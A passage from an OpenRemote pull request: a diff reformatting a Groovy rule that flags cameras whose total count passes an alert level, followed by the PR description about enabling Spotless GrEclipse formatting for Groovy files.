-        assets.dispatch(attributesEvents.toArray(new AttributeEvent[attributesEvents.size()]))
-})
 
 rules.add()
         .name("Send alert when cameraCountTotalAlertLevel is passed")
-        .when({
-    facts ->
+        .when({ facts ->
 
-        def cameraIds = facts.matchAssetState(new AssetQuery()
-                .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
-                .attributeName("cameraCountTotalAlert"))
-                .filter(
-                {
-                    !it.value.orElse(false) &&
-                    facts.matchFirstAssetState(new AssetQuery()
-                            .ids(it.id)
-                            .attributeName("cameraCountTotal"))
-                            .map({ it.value.orElse(-1) })
-                            .orElse(-1) >
-                            facts.matchFirstAssetState(new AssetQuery()
-                                    .ids(it.id)
-                                    .attributeName("cameraCountTotalAlertLevel"))
-                                    .map({ it.value.orElse(-1) })
-                                    .orElse(-1)
-                })
-                .map({ it.id })
-                .collect()
+          def cameraIds = facts.matchAssetState(new AssetQuery()
+          .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
+          .attributeName("cameraCountTotalAlert"))
+          .filter({
+            !it.value.orElse(false) &&
+            facts.matchFirstAssetState(new AssetQuery()
+            .ids(it.id)
+            .attributeName("cameraCountTotal"))
+            .map({ it.value.orElse(-1) })
+            .orElse(-1) >
+            facts.matchFirstAssetState(new AssetQuery()
+            .ids(it.id)
+            .attributeName("cameraCountTotalAlertLevel"))
+            .map({ it.value.orElse(-1) })
+            .orElse(-1)
+          })
+          .map({ it.id })
+          .collect()
 
-        if (cameraIds.size() > 0) {
+          if (cameraIds.size() > 0) {
             facts.bind("cameraIds", cameraIds)
             true
-        } else {
+          } else {
             false
-        }
-}).then({
-    facts ->
-        List<String> cameraIds = facts.bound("cameraIds")
-        cameraIds.forEach({
+          }
+        }).then({ facts ->
+          List<String> cameraIds = facts.bound("cameraIds")
+          cameraIds.forEach({
             facts.updateAssetState(it, "cameraCountTotalAlert", true)
+          })
         })
-})


### PR DESCRIPTION
## Description

This enables GrEclipse formatting for Groovy files as part of the Spotless configuration.

Some existing Groovy code uses constructs that GrEclipse cannot currently parse or format correctly. The first commit makes these files compatible with the formatter by:

* replacing Java-style double-brace `HashMap` initialization with Groovy map initialization;
* replacing Java method references with Groovy closures;
* excluding `BasicBrokenRules.groovy`, which intentionally contains invalid Groovy syntax;
* enabling GrEclipse using the existing Google style configuration.

The second commit applies Spotless formatting to the Groovy files.

Fixes #3138

### Merge

The two commits should preferably remain separate:

1. Enable Spotless formatting for Groovy files — functional/configuration changes required to enable formatting.
2. Format Groovy files — formatting-only changes.

To preserve this separation, the PR should preferably be rebased/merged with the merge queue temporarily disabled rather than squashed.

After merging, the resulting SHA of the Format Groovy files commit can be added to [`.git-blame-ignore-revs`](https://github.com/openremote/openremote/blob/master/.git-blame-ignore-revs), so the repository-wide formatting changes do not interfere with `git blame`.

## Checklist

<!--
  With all these boxes checked this PR conforms to our Definition of Done.
-->

- [ ] 1. Acceptance criteria of the linked issue(s) are met
- [ ] 2. Tests are written and all tests pass
- [ ] 3. Changes are manually tested by you and the reviewer
- [ ] 4. Documentation is written or updated

<!--
  Thank you for your contribution <3
-->
